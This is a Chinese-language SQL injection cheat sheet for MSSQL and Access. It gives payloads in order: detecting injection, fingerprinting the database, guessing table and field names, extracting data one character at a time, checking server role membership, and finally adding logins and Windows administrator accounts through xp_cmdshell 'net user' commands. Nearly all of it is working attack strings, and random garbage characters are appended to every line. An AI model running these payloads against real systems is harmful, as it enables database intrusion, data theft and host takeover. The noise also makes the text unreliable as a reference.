1.判断是否有注入;and 1=1 ;and 1=2 ;JgSA&'e
2.初步判断是否是mssql ;and user>0 Y]Z&
deq5u>
3.注入参数是字符'and [查询条件] and ''=' 6)W8H X~+
JG&E"j#q
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 0LYf0^P
+t&+f7
5.判断数据库系统 %%I:L~c
bKsEXS
;and (select count(*) from sysobjects)>0 mssql
DZ4gp
1r*yYm'
;and (select count(*) from msysobjects)>0 access oB>#P-V
dcTZL$
Yakrsi/jV}
XH0o8\.
6.猜数据库 ;and (select Count(*) from [数据库名])>0 y |i(~
P[$idRS&
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 P.g./8N`z
Z\]LG4N?
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 v~W;&{
qx9;"Ut
9.(1)猜字段的ascii值(access) mKyF<1,m
wAgVevE
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 tk:nth
`sy_'`i>X
(2)猜字段的ascii值(mssql) L_|iQwU%
gwsOw [;k
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 `:R9M+
OX
,_/\pX0
10.测试权限结构(mssql) +uj;00 D
IP-M)_I
3 ]@wa!`
U3-MvI,Q
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- t;0]d7ey'
N})vrB;1
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 0v6Z4Ahpo
$ %|b6Gr/&
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ;CoD5F!
T00sYoK
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- \TnK<83
{X<_Y<
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ;Jb%2?+=!
PMX'vA`
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 2P${5WT
b"`Q&V.
;and 1=(select IS_MEMBER('db_owner'));-- ke KsLrd
H#WqO<<v
X+HPdrT
6' \M:'<0e
11.添加mssql和系统的帐户 3u 7A(
j|qdf3^f
;exec master.dbo.sp_addlogin username;-- ?' mP`9I
;exec master.dbo.sp_password null,username,password;-- W5()A,R
f_;tFP
B
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ?B)e8i<[f
)7-mALyW
;exec master.dbo.xp_cmdshell 'net user username password WP Gp(Xw
PI9aKNt
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- wr(*RI"
O<mA+yk
;exec master.dbo.xp_cmdshell 'net user username password /add';-- G(o6/
+z#+}'mT%
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- *lu*h&Y